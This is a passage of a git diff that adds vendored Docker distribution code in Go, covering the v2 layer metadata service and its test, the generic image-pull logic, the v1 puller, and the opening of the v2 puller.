+// authConfigKeyInput is a reduced AuthConfig structure holding just relevant credential data eligible for
+// hmac key creation.
+type authConfigKeyInput struct {
+	Username string `json:"username,omitempty"`
+	Password string `json:"password,omitempty"`
+	Auth     string `json:"auth,omitempty"`
+
+	IdentityToken string `json:"identitytoken,omitempty"`
+	RegistryToken string `json:"registrytoken,omitempty"`
+}
+
+// maxMetadata is the number of metadata entries to keep per layer DiffID.
+const maxMetadata = 50
+
+// NewV2MetadataService creates a new diff ID to v2 metadata mapping service.
+func NewV2MetadataService(store Store) V2MetadataService {
+	return &v2MetadataService{
+		store: store,
+	}
+}
+
+func (serv *v2MetadataService) diffIDNamespace() string {
+	return "v2metadata-by-diffid"
+}
+
+func (serv *v2MetadataService) digestNamespace() string {
+	return "diffid-by-digest"
+}
+
+func (serv *v2MetadataService) diffIDKey(diffID layer.DiffID) string {
+	return string(digest.Digest(diffID).Algorithm()) + "/" + digest.Digest(diffID).Hex()
+}
+
+func (serv *v2MetadataService) digestKey(dgst digest.Digest) string {
+	return string(dgst.Algorithm()) + "/" + dgst.Hex()
+}
+
+// GetMetadata finds the metadata associated with a layer DiffID.
+func (serv *v2MetadataService) GetMetadata(diffID layer.DiffID) ([]V2Metadata, error) {
+	if serv.store == nil {
+		return nil, errors.New("no metadata storage")
+	}
+	jsonBytes, err := serv.store.Get(serv.diffIDNamespace(), serv.diffIDKey(diffID))
+	if err != nil {
+		return nil, err
+	}
+
+	var metadata []V2Metadata
+	if err := json.Unmarshal(jsonBytes, &metadata); err != nil {
+		return nil, err
+	}
+
+	return metadata, nil
+}
+
+// GetDiffID finds a layer DiffID from a digest.
+func (serv *v2MetadataService) GetDiffID(dgst digest.Digest) (layer.DiffID, error) {
+	if serv.store == nil {
+		return layer.DiffID(""), errors.New("no metadata storage")
+	}
+	diffIDBytes, err := serv.store.Get(serv.digestNamespace(), serv.digestKey(dgst))
+	if err != nil {
+		return layer.DiffID(""), err
+	}
+
+	return layer.DiffID(diffIDBytes), nil
+}
+
+// Add associates metadata with a layer DiffID. If too many metadata entries are
+// present, the oldest one is dropped.
+func (serv *v2MetadataService) Add(diffID layer.DiffID, metadata V2Metadata) error {
+	if serv.store == nil {
+		// Support a service which has no backend storage, in this case
+		// an add becomes a no-op.
+		// TODO: implement in memory storage
+		return nil
+	}
+	oldMetadata, err := serv.GetMetadata(diffID)
+	if err != nil {
+		oldMetadata = nil
+	}
+	newMetadata := make([]V2Metadata, 0, len(oldMetadata)+1)
+
+	// Copy all other metadata to new slice
+	for _, oldMeta := range oldMetadata {
+		if oldMeta != metadata {
+			newMetadata = append(newMetadata, oldMeta)
+		}
+	}
+
+	newMetadata = append(newMetadata, metadata)
+
+	if len(newMetadata) > maxMetadata {
+		newMetadata = newMetadata[len(newMetadata)-maxMetadata:]
+	}
+
+	jsonBytes, err := json.Marshal(newMetadata)
+	if err != nil {
+		return err
+	}
+
+	err = serv.store.Set(serv.diffIDNamespace(), serv.diffIDKey(diffID), jsonBytes)
+	if err != nil {
+		return err
+	}
+
+	return serv.store.Set(serv.digestNamespace(), serv.digestKey(metadata.Digest), []byte(diffID))
+}
+
+// TagAndAdd amends the given "meta" for hmac hashed by the given "hmacKey" and associates it with a layer
+// DiffID. If too many metadata entries are present, the oldest one is dropped.
+func (serv *v2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, meta V2Metadata) error {
+	meta.HMAC = ComputeV2MetadataHMAC(hmacKey, &meta)
+	return serv.Add(diffID, meta)
+}
+
+// Remove unassociates a metadata entry from a layer DiffID.
+func (serv *v2MetadataService) Remove(metadata V2Metadata) error {
+	if serv.store == nil {
+		// Support a service which has no backend storage, in this case
+		// an remove becomes a no-op.
+		// TODO: implement in memory storage
+		return nil
+	}
+	diffID, err := serv.GetDiffID(metadata.Digest)
+	if err != nil {
+		return err
+	}
+	oldMetadata, err := serv.GetMetadata(diffID)
+	if err != nil {
+		oldMetadata = nil
+	}
+	newMetadata := make([]V2Metadata, 0, len(oldMetadata))
+
+	// Copy all other metadata to new slice
+	for _, oldMeta := range oldMetadata {
+		if oldMeta != metadata {
+			newMetadata = append(newMetadata, oldMeta)
+		}
+	}
+
+	if len(newMetadata) == 0 {
+		return serv.store.Delete(serv.diffIDNamespace(), serv.diffIDKey(diffID))
+	}
+
+	jsonBytes, err := json.Marshal(newMetadata)
+	if err != nil {
+		return err
+	}
+
+	return serv.store.Set(serv.diffIDNamespace(), serv.diffIDKey(diffID), jsonBytes)
+}
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go
new file mode 100644
index 0000000000..7b0ecb1572
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go
@@ -0,0 +1,115 @@
+package metadata
+
+import (
+	"encoding/hex"
+	"io/ioutil"
+	"math/rand"
+	"os"
+	"reflect"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/layer"
+)
+
+func TestV2MetadataService(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "blobsum-storage-service-test")
+	if err != nil {
+		t.Fatalf("could not create temp dir: %v", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	metadataStore, err := NewFSMetadataStore(tmpDir)
+	if err != nil {
+		t.Fatalf("could not create metadata store: %v", err)
+	}
+	V2MetadataService := NewV2MetadataService(metadataStore)
+
+	tooManyBlobSums := make([]V2Metadata, 100)
+	for i := range tooManyBlobSums {
+		randDigest := randomDigest()
+		tooManyBlobSums[i] = V2Metadata{Digest: randDigest}
+	}
+
+	testVectors := []struct {
+		diffID   layer.DiffID
+		metadata []V2Metadata
+	}{
+		{
+			diffID: layer.DiffID("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"),
+			metadata: []V2Metadata{
+				{Digest: digest.Digest("sha256:f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937")},
+			},
+		},
+		{
+			diffID: layer.DiffID("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa"),
+			metadata: []V2Metadata{
+				{Digest: digest.Digest("sha256:f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937")},
+				{Digest: digest.Digest("sha256:9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e")},
+			},
+		},
+		{
+			diffID:   layer.DiffID("sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"),
+			metadata: tooManyBlobSums,
+		},
+	}
+
+	// Set some associations
+	for _, vec := range testVectors {
+		for _, blobsum := range vec.metadata {
+			err := V2MetadataService.Add(vec.diffID, blobsum)
+			if err != nil {
+				t.Fatalf("error calling Set: %v", err)
+			}
+		}
+	}
+
+	// Check the correct values are read back
+	for _, vec := range testVectors {
+		metadata, err := V2MetadataService.GetMetadata(vec.diffID)
+		if err != nil {
+			t.Fatalf("error calling Get: %v", err)
+		}
+		expectedMetadataEntries := len(vec.metadata)
+		if expectedMetadataEntries > 50 {
+			expectedMetadataEntries = 50
+		}
+		if !reflect.DeepEqual(metadata, vec.metadata[len(vec.metadata)-expectedMetadataEntries:len(vec.metadata)]) {
+			t.Fatal("Get returned incorrect layer ID")
+		}
+	}
+
+	// Test GetMetadata on a nonexistent entry
+	_, err = V2MetadataService.GetMetadata(layer.DiffID("sha256:82379823067823853223359023576437723560923756b03560378f4497753917"))
+	if err == nil {
+		t.Fatal("expected error looking up nonexistent entry")
+	}
+
+	// Test GetDiffID on a nonexistent entry
+	_, err = V2MetadataService.GetDiffID(digest.Digest("sha256:82379823067823853223359023576437723560923756b03560378f4497753917"))
+	if err == nil {
+		t.Fatal("expected error looking up nonexistent entry")
+	}
+
+	// Overwrite one of the entries and read it back
+	err = V2MetadataService.Add(testVectors[1].diffID, testVectors[0].metadata[0])
+	if err != nil {
+		t.Fatalf("error calling Add: %v", err)
+	}
+	diffID, err := V2MetadataService.GetDiffID(testVectors[0].metadata[0].Digest)
+	if err != nil {
+		t.Fatalf("error calling GetDiffID: %v", err)
+	}
+	if diffID != testVectors[1].diffID {
+		t.Fatal("GetDiffID returned incorrect diffID")
+	}
+}
+
+func randomDigest() digest.Digest {
+	b := [32]byte{}
+	for i := 0; i < len(b); i++ {
+		b[i] = byte(rand.Intn(256))
+	}
+	d := hex.EncodeToString(b[:])
+	return digest.Digest("sha256:" + d)
+}
diff --git a/vendor/github.com/docker/docker/distribution/pull.go b/vendor/github.com/docker/docker/distribution/pull.go
new file mode 100644
index 0000000000..a0acfe5b6b
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/pull.go
@@ -0,0 +1,200 @@
+package distribution
+
+import (
+	"fmt"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"golang.org/x/net/context"
+)
+
+// Puller is an interface that abstracts pulling for different API versions.
+type Puller interface {
+	// Pull tries to pull the image referenced by `tag`
+	// Pull returns an error if any, as well as a boolean that determines whether to retry Pull on the next configured endpoint.
+	//
+	Pull(ctx context.Context, ref reference.Named) error
+}
+
+// newPuller returns a Puller interface that will pull from either a v1 or v2
+// registry. The endpoint argument contains a Version field that determines
+// whether a v1 or v2 puller will be created. The other parameters are passed
+// through to the underlying puller implementation for use during the actual
+// pull operation.
+func newPuller(endpoint registry.APIEndpoint, repoInfo *registry.RepositoryInfo, imagePullConfig *ImagePullConfig) (Puller, error) {
+	switch endpoint.Version {
+	case registry.APIVersion2:
+		return &v2Puller{
+			V2MetadataService: metadata.NewV2MetadataService(imagePullConfig.MetadataStore),
+			endpoint:          endpoint,
+			config:            imagePullConfig,
+			repoInfo:          repoInfo,
+		}, nil
+	case registry.APIVersion1:
+		return &v1Puller{
+			v1IDService: metadata.NewV1IDService(imagePullConfig.MetadataStore),
+			endpoint:    endpoint,
+			config:      imagePullConfig,
+			repoInfo:    repoInfo,
+		}, nil
+	}
+	return nil, fmt.Errorf("unknown version %d for registry %s", endpoint.Version, endpoint.URL)
+}
+
+// Pull initiates a pull operation. image is the repository name to pull, and
+// tag may be either empty, or indicate a specific tag to pull.
+func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullConfig) error {
+	// Resolve the Repository name from fqn to RepositoryInfo
+	repoInfo, err := imagePullConfig.RegistryService.ResolveRepository(ref)
+	if err != nil {
+		return err
+	}
+
+	// makes sure name is not empty or `scratch`
+	if err := ValidateRepoName(repoInfo.Name()); err != nil {
+		return err
+	}
+
+	endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(repoInfo.Hostname())
+	if err != nil {
+		return err
+	}
+
+	var (
+		lastErr error
+
+		// discardNoSupportErrors is used to track whether an endpoint encountered an error of type registry.ErrNoSupport
+		// By default it is false, which means that if an ErrNoSupport error is encountered, it will be saved in lastErr.
+		// As soon as another kind of error is encountered, discardNoSupportErrors is set to true, avoiding the saving of
+		// any subsequent ErrNoSupport errors in lastErr.
+		// It's needed for pull-by-digest on v1 endpoints: if there are only v1 endpoints configured, the error should be
+		// returned and displayed, but if there was a v2 endpoint which supports pull-by-digest, then the last relevant
+		// error is the ones from v2 endpoints not v1.
+		discardNoSupportErrors bool
+
+		// confirmedV2 is set to true if a pull attempt managed to
+		// confirm that it was talking to a v2 registry. This will
+		// prevent fallback to the v1 protocol.
+		confirmedV2 bool
+
+		// confirmedTLSRegistries is a map indicating which registries
+		// are known to be using TLS. There should never be a plaintext
+		// retry for any of these.
+		confirmedTLSRegistries = make(map[string]struct{})
+	)
+	for _, endpoint := range endpoints {
+		if imagePullConfig.RequireSchema2 && endpoint.Version == registry.APIVersion1 {
+			continue
+		}
+
+		if confirmedV2 && endpoint.Version == registry.APIVersion1 {
+			logrus.Debugf("Skipping v1 endpoint %s because v2 registry was detected", endpoint.URL)
+			continue
+		}
+
+		if endpoint.URL.Scheme != "https" {
+			if _, confirmedTLS := confirmedTLSRegistries[endpoint.URL.Host]; confirmedTLS {
+				logrus.Debugf("Skipping non-TLS endpoint %s for host/port that appears to use TLS", endpoint.URL)
+				continue
+			}
+		}
+
+		logrus.Debugf("Trying to pull %s from %s %s", repoInfo.Name(), endpoint.URL, endpoint.Version)
+
+		puller, err := newPuller(endpoint, repoInfo, imagePullConfig)
+		if err != nil {
+			lastErr = err
+			continue
+		}
+		if err := puller.Pull(ctx, ref); err != nil {
+			// Was this pull cancelled? If so, don't try to fall
+			// back.
+			fallback := false
+			select {
+			case <-ctx.Done():
+			default:
+				if fallbackErr, ok := err.(fallbackError); ok {
+					fallback = true
+					confirmedV2 = confirmedV2 || fallbackErr.confirmedV2
+					if fallbackErr.transportOK && endpoint.URL.Scheme == "https" {
+						confirmedTLSRegistries[endpoint.URL.Host] = struct{}{}
+					}
+					err = fallbackErr.err
+				}
+			}
+			if fallback {
+				if _, ok := err.(ErrNoSupport); !ok {
+					// Because we found an error that's not ErrNoSupport, discard all subsequent ErrNoSupport errors.
+					discardNoSupportErrors = true
+					// append subsequent errors
+					lastErr = err
+				} else if !discardNoSupportErrors {
+					// Save the ErrNoSupport error, because it's either the first error or all encountered errors
+					// were also ErrNoSupport errors.
+					// append subsequent errors
+					lastErr = err
+				}
+				logrus.Errorf("Attempting next endpoint for pull after error: %v", err)
+				continue
+			}
+			logrus.Errorf("Not continuing with pull after error: %v", err)
+			return TranslatePullError(err, ref)
+		}
+
+		imagePullConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "pull")
+		return nil
+	}
+
+	if lastErr == nil {
+		lastErr = fmt.Errorf("no endpoints found for %s", ref.String())
+	}
+
+	return TranslatePullError(lastErr, ref)
+}
+
+// writeStatus writes a status message to out. If layersDownloaded is true, the
+// status message indicates that a newer image was downloaded. Otherwise, it
+// indicates that the image is up to date. requestedTag is the tag the message
+// will refer to.
+func writeStatus(requestedTag string, out progress.Output, layersDownloaded bool) {
+	if layersDownloaded {
+		progress.Message(out, "", "Status: Downloaded newer image for "+requestedTag)
+	} else {
+		progress.Message(out, "", "Status: Image is up to date for "+requestedTag)
+	}
+}
+
+// ValidateRepoName validates the name of a repository.
+func ValidateRepoName(name string) error {
+	if name == "" {
+		return fmt.Errorf("Repository name can't be empty")
+	}
+	if name == api.NoBaseImageSpecifier {
+		return fmt.Errorf("'%s' is a reserved name", api.NoBaseImageSpecifier)
+	}
+	return nil
+}
+
+func addDigestReference(store reference.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error {
+	dgstRef, err := reference.WithDigest(reference.TrimNamed(ref), dgst)
+	if err != nil {
+		return err
+	}
+
+	if oldTagID, err := store.Get(dgstRef); err == nil {
+		if oldTagID != id {
+			// Updating digests not supported by reference store
+			logrus.Errorf("Image ID for digest %s changed from %s to %s, cannot update", dgst.String(), oldTagID, id)
+		}
+		return nil
+	} else if err != reference.ErrDoesNotExist {
+		return err
+	}
+
+	return store.AddDigest(dgstRef, id, true)
+}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v1.go b/vendor/github.com/docker/docker/distribution/pull_v1.go
new file mode 100644
index 0000000000..f44ed4f371
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/pull_v1.go
@@ -0,0 +1,368 @@
+package distribution
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/url"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/image/v1"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"golang.org/x/net/context"
+)
+
+type v1Puller struct {
+	v1IDService *metadata.V1IDService
+	endpoint    registry.APIEndpoint
+	config      *ImagePullConfig
+	repoInfo    *registry.RepositoryInfo
+	session     *registry.Session
+}
+
+func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error {
+	if _, isCanonical := ref.(reference.Canonical); isCanonical {
+		// Allowing fallback, because HTTPS v1 is before HTTP v2
+		return fallbackError{err: ErrNoSupport{Err: errors.New("Cannot pull by digest with v1 registry")}}
+	}
+
+	tlsConfig, err := p.config.RegistryService.TLSConfig(p.repoInfo.Index.Name)
+	if err != nil {
+		return err
+	}
+	// Adds Docker-specific headers as well as user-specified headers (metaHeaders)
+	tr := transport.NewTransport(
+		// TODO(tiborvass): was ReceiveTimeout
+		registry.NewTransport(tlsConfig),
+		registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)...,
+	)
+	client := registry.HTTPClient(tr)
+	v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)
+	if err != nil {
+		logrus.Debugf("Could not get v1 endpoint: %v", err)
+		return fallbackError{err: err}
+	}
+	p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint)
+	if err != nil {
+		// TODO(dmcgowan): Check if should fallback
+		logrus.Debugf("Fallback from error: %s", err)
+		return fallbackError{err: err}
+	}
+	if err := p.pullRepository(ctx, ref); err != nil {
+		// TODO(dmcgowan): Check if should fallback
+		return err
+	}
+	progress.Message(p.config.ProgressOutput, "", p.repoInfo.FullName()+": this image was pulled from a legacy registry.  Important: This registry version will not be supported in future versions of docker.")
+
+	return nil
+}
+
+func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) error {
+	progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.FullName())
+
+	tagged, isTagged := ref.(reference.NamedTagged)
+
+	repoData, err := p.session.GetRepositoryData(p.repoInfo)
+	if err != nil {
+		if strings.Contains(err.Error(), "HTTP code: 404") {
+			if isTagged {
+				return fmt.Errorf("Error: image %s:%s not found", p.repoInfo.RemoteName(), tagged.Tag())
+			}
+			return fmt.Errorf("Error: image %s not found", p.repoInfo.RemoteName())
+		}
+		// Unexpected HTTP error
+		return err
+	}
+
+	logrus.Debug("Retrieving the tag list")
+	var tagsList map[string]string
+	if !isTagged {
+		tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo)
+	} else {
+		var tagID string
+		tagsList = make(map[string]string)
+		tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo, tagged.Tag())
+		if err == registry.ErrRepoNotFound {
+			return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.FullName())
+		}
+		tagsList[tagged.Tag()] = tagID
+	}
+	if err != nil {
+		logrus.Errorf("unable to get remote tags: %s", err)
+		return err
+	}
+
+	for tag, id := range tagsList {
+		repoData.ImgList[id] = &registry.ImgData{
+			ID:       id,
+			Tag:      tag,
+			Checksum: "",
+		}
+	}
+
+	layersDownloaded := false
+	for _, imgData := range repoData.ImgList {
+		if isTagged && imgData.Tag != tagged.Tag() {
+			continue
+		}
+
+		err := p.downloadImage(ctx, repoData, imgData, &layersDownloaded)
+		if err != nil {
+			return err
+		}
+	}
+
+	writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded)
+	return nil
+}
+
+func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.RepositoryData, img *registry.ImgData, layersDownloaded *bool) error {
+	if img.Tag == "" {
+		logrus.Debugf("Image (id: %s) present in this repository but untagged, skipping", img.ID)
+		return nil
+	}
+
+	localNameRef, err := reference.WithTag(p.repoInfo, img.Tag)
+	if err != nil {
+		retErr := fmt.Errorf("Image (id: %s) has invalid tag: %s", img.ID, img.Tag)
+		logrus.Debug(retErr.Error())
+		return retErr
+	}
+
+	if err := v1.ValidateID(img.ID); err != nil {
+		return err
+	}
+
+	progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.FullName())
+	success := false
+	var lastErr error
+	for _, ep := range p.repoInfo.Index.Mirrors {
+		ep += "v1/"
+		progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.FullName(), ep))
+		if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil {
+			// Don't report errors when pulling from mirrors.
+			logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err)
+			continue
+		}
+		success = true
+		break
+	}
+	if !success {
+		for _, ep := range repoData.Endpoints {
+			progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.FullName(), ep)
+			if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil {
+				// It's not ideal that only the last error is returned, it would be better to concatenate the errors.
+				// As the error is also given to the output stream the user will see the error.
+				lastErr = err
+				progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err)
+				continue
+			}
+			success = true
+			break
+		}
+	}
+	if !success {
+		err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.FullName(), lastErr)
+		progress.Update(p.config.ProgressOutput, stringid.TruncateID(img.ID), err.Error())
+		return err
+	}
+	return nil
+}
+
+func (p *v1Puller) pullImage(ctx context.Context, v1ID, endpoint string, localNameRef reference.Named, layersDownloaded *bool) (err error) {
+	var history []string
+	history, err = p.session.GetRemoteHistory(v1ID, endpoint)
+	if err != nil {
+		return err
+	}
+	if len(history) < 1 {
+		return fmt.Errorf("empty history for image %s", v1ID)
+	}
+	progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1ID), "Pulling dependent layers")
+
+	var (
+		descriptors []xfer.DownloadDescriptor
+		newHistory  []image.History
+		imgJSON     []byte
+		imgSize     int64
+	)
+
+	// Iterate over layers, in order from bottom-most to top-most. Download
+	// config for all layers and create descriptors.
+	for i := len(history) - 1; i >= 0; i-- {
+		v1LayerID := history[i]
+		imgJSON, imgSize, err = p.downloadLayerConfig(v1LayerID, endpoint)
+		if err != nil {
+			return err
+		}
+
+		// Create a new-style config from the legacy configs
+		h, err := v1.HistoryFromConfig(imgJSON, false)
+		if err != nil {
+			return err
+		}
+		newHistory = append(newHistory, h)
+
+		layerDescriptor := &v1LayerDescriptor{
+			v1LayerID:        v1LayerID,
+			indexName:        p.repoInfo.Index.Name,
+			endpoint:         endpoint,
+			v1IDService:      p.v1IDService,
+			layersDownloaded: layersDownloaded,
+			layerSize:        imgSize,
+			session:          p.session,
+		}
+
+		descriptors = append(descriptors, layerDescriptor)
+	}
+
+	rootFS := image.NewRootFS()
+	resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput)
+	if err != nil {
+		return err
+	}
+	defer release()
+
+	config, err := v1.MakeConfigFromV1Config(imgJSON, &resultRootFS, newHistory)
+	if err != nil {
+		return err
+	}
+
+	imageID, err := p.config.ImageStore.Put(config)
+	if err != nil {
+		return err
+	}
+
+	if p.config.ReferenceStore != nil {
+		if err := p.config.ReferenceStore.AddTag(localNameRef, imageID, true); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func (p *v1Puller) downloadLayerConfig(v1LayerID, endpoint string) (imgJSON []byte, imgSize int64, err error) {
+	progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1LayerID), "Pulling metadata")
+
+	retries := 5
+	for j := 1; j <= retries; j++ {
+		imgJSON, imgSize, err := p.session.GetRemoteImageJSON(v1LayerID, endpoint)
+		if err != nil && j == retries {
+			progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1LayerID), "Error pulling layer metadata")
+			return nil, 0, err
+		} else if err != nil {
+			time.Sleep(time.Duration(j) * 500 * time.Millisecond)
+			continue
+		}
+
+		return imgJSON, imgSize, nil
+	}
+
+	// not reached
+	return nil, 0, nil
+}
+
+type v1LayerDescriptor struct {
+	v1LayerID        string
+	indexName        string
+	endpoint         string
+	v1IDService      *metadata.V1IDService
+	layersDownloaded *bool
+	layerSize        int64
+	session          *registry.Session
+	tmpFile          *os.File
+}
+
+func (ld *v1LayerDescriptor) Key() string {
+	return "v1:" + ld.v1LayerID
+}
+
+func (ld *v1LayerDescriptor) ID() string {
+	return stringid.TruncateID(ld.v1LayerID)
+}
+
+func (ld *v1LayerDescriptor) DiffID() (layer.DiffID, error) {
+	return ld.v1IDService.Get(ld.v1LayerID, ld.indexName)
+}
+
+func (ld *v1LayerDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) {
+	progress.Update(progressOutput, ld.ID(), "Pulling fs layer")
+	layerReader, err := ld.session.GetRemoteImageLayer(ld.v1LayerID, ld.endpoint, ld.layerSize)
+	if err != nil {
+		progress.Update(progressOutput, ld.ID(), "Error pulling dependent layers")
+		if uerr, ok := err.(*url.Error); ok {
+			err = uerr.Err
+		}
+		if terr, ok := err.(net.Error); ok && terr.Timeout() {
+			return nil, 0, err
+		}
+		return nil, 0, xfer.DoNotRetry{Err: err}
+	}
+	*ld.layersDownloaded = true
+
+	ld.tmpFile, err = ioutil.TempFile("", "GetImageBlob")
+	if err != nil {
+		layerReader.Close()
+		return nil, 0, err
+	}
+
+	reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, layerReader), progressOutput, ld.layerSize, ld.ID(), "Downloading")
+	defer reader.Close()
+
+	_, err = io.Copy(ld.tmpFile, reader)
+	if err != nil {
+		ld.Close()
+		return nil, 0, err
+	}
+
+	progress.Update(progressOutput, ld.ID(), "Download complete")
+
+	logrus.Debugf("Downloaded %s to tempfile %s", ld.ID(), ld.tmpFile.Name())
+
+	ld.tmpFile.Seek(0, 0)
+
+	// hand off the temporary file to the download manager, so it will only
+	// be closed once
+	tmpFile := ld.tmpFile
+	ld.tmpFile = nil
+
+	return ioutils.NewReadCloserWrapper(tmpFile, func() error {
+		tmpFile.Close()
+		err := os.RemoveAll(tmpFile.Name())
+		if err != nil {
+			logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name())
+		}
+		return err
+	}), ld.layerSize, nil
+}
+
+func (ld *v1LayerDescriptor) Close() {
+	if ld.tmpFile != nil {
+		ld.tmpFile.Close()
+		if err := os.RemoveAll(ld.tmpFile.Name()); err != nil {
+			logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name())
+		}
+		ld.tmpFile = nil
+	}
+}
+
+func (ld *v1LayerDescriptor) Registered(diffID layer.DiffID) {
+	// Cache mapping from this layer's DiffID to the blobsum
+	ld.v1IDService.Set(ld.v1LayerID, ld.indexName, diffID)
+}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2.go b/vendor/github.com/docker/docker/distribution/pull_v2.go
new file mode 100644
index 0000000000..88807edc7d
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/pull_v2.go
@@ -0,0 +1,878 @@
+package distribution
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/url"
+	"os"
+	"runtime"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/manifestlist"
+	"github.com/docker/distribution/manifest/schema1"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/distribution/registry/api/errcode"
+	"github.com/docker/distribution/registry/client/auth"
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/image/v1"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"golang.org/x/net/context"
+)
+
+var (
+	errRootFSMismatch = errors.New("layers from manifest don't match image configuration")
+	errRootFSInvalid  = errors.New("invalid rootfs in image configuration")
+)
+
+// ImageConfigPullError is an error pulling the image config blob
+// (only applies to schema2).
+type ImageConfigPullError struct {
+	Err error
+}
+
+// Error returns the error string for ImageConfigPullError.
+func (e ImageConfigPullError) Error() string {
+	return "error pulling image configuration: " + e.Err.Error()
+}
+
+type v2Puller struct {
+	V2MetadataService metadata.V2MetadataService
+	endpoint          registry.APIEndpoint
+	config            *ImagePullConfig
+	repoInfo          *registry.RepositoryInfo
+	repo              distribution.Repository
+	// confirmedV2 is set to true if we confirm we're talking to a v2
+	// registry. This is used to limit fallbacks to the v1 protocol.
+	confirmedV2 bool
+}
+
+func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) {
+	// TODO(tiborvass): was ReceiveTimeout
+	p.repo, p.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull")
+	if err != nil {
+		logrus.Warnf("Error getting v2 registry: %v", err)
+		return err
+	}
+
+	if err = p.pullV2Repository(ctx, ref); err != nil {
+		if _, ok := err.(fallbackError); ok {
+			return err
+		}
+		if continueOnError(err) {
+			logrus.Errorf("Error trying v2 registry: %v", err)
+			return fallbackError{
+				err:         err,
+				confirmedV2: p.confirmedV2,
+				transportOK: true,
+			}
+		}
+	}
+	return err
+}
+
